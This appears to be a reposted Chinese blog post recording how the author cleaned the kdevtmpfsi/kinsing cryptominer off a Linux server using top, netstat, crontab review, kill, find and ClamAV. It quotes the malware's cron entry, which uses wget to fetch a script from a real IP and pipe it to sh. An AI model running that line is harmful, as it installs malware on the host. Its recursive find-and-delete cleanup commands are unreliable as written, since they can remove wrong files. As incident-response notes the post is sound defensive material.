标签:kinsing 记录 ip 3127 kdevtmpfsi 进程 find 挖矿
病毒名称:kdevtmpfsi
状态:CPU爆满,导致线上服务宕机。
图片是盗的,进程占用是真实的。
1、# top
查看cpu占用情况,找到占用cpu的进程 最后是 kdevtmpfsi
2、# netstat -natp
根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了
此时,挖矿脚本大概率定时在你的crontab里面。
crontab -l ,发现异常定时任务,* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
查看这个进程运行状态
systemctl status 3127
systemctl status 3127
ps -aux | grep kinsing
ps -aux | grep kdevtmpfsi
kill -9 3127
cd /tmp
ls
rm -rf kdevtmpfsi
rm -rf /var/tmp/kinsing 记得这个守护进程的文件也要删掉,找不到的话,也可以用这个命令
find / -name kdevtmpfsi
find / -name kinsing
进入/var/spool/cron 查看是否有相关的木马定时任务在执行 有的话删掉再重启下crontab
后续工作溯源,找到程序漏洞,封禁访问ip,不正常ip。源程序下载。
使用clamav对整个Linux做全盘扫描,确定被感染文件并删除。
查找守护进程文件变种名字。
全部删除
find / -name "kinsing*" | xargs rm -rf
至此杀毒工作基本进入尾声。后面几天观察服务器服务,进程是否异常。
标签:kinsing,记录,ip,3127,kdevtmpfsi,进程,find,挖矿 来源: https://www.cnblogs.com/llody/p/12133372.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。